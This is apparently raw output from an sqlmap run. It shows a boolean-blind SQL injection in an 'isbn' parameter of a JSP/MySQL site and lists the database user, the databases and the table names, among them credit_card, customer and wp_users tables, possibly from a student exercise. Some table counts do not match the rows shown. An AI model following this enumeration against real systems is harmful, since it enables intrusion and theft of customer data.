
    sqlmap/1.0-dev-f11e15a - automatic SQL injection and database takeover tool
    http://sqlmap.org


[*] starting at 22:35:21

---
Parameter: isbn
    Type: boolean-based blind

---
web application technology: 	JSP, JSP 2.2
banner parsing fingerprint: 	MySQL 5.5.32
banner:    			'5.5.32-0ubuntu0.12.04.1'
current user:    		'sigbjoo_group12@%'
current database:    		'sigbjoo_group12'
hostname:    			'arctos'

database management system users [1]:
	[*] 'sigbjoo_group12'@'%'

database management system users privileges:
	[*] %sigbjoo_group12% [1]:

database management system users roles:
	[*] %sigbjoo_group12% [1]:

available databases [4]:
	[*] information_schema
	[*] sigbjoo_group12
	[*] test
	[*] test_oyas


+---------------------------------------+
| wp_commentmeta                        |
| wp_comments                           |
| wp_links                              |
| wp_options                            |
| wp_postmeta                           |
| wp_posts                              |
| wp_term_relationships                 |
| wp_term_taxonomy                      |
| wp_terms                              |
| wp_usermeta                           |
| wp_users                              |
+---------------------------------------+

[40 tables]
+---------------------------------------+
| COLLATIONS                            |
| PARTITIONS                            |
| STATISTICS                            |
+---------------------------------------+

[13 tables]
+---------------------------------------+
| order                                 |
| address                               |
| author                                |
| author_x_book                         |
| book                                  |
| category                              |
| category_x_title                      |
| credit_card                           |
| customer                              |
| mail                                  |
| order_items                           |
| publisher                             |
| title                                 |
+---------------------------------------+
16 tables]
+---------------------------------------+
| tblKontakter                          |
| tblKontakterlocA                      |
| tblPlan                               |
| tblPlanlocA                           |
| tblReirbesok                          |
| tblReirbesoklocA                      |
| tblReirunge                           |
| tblReirungelocA                       |
| tblSted                               |
| tblStedlocA                           |
+---------------------------------------+
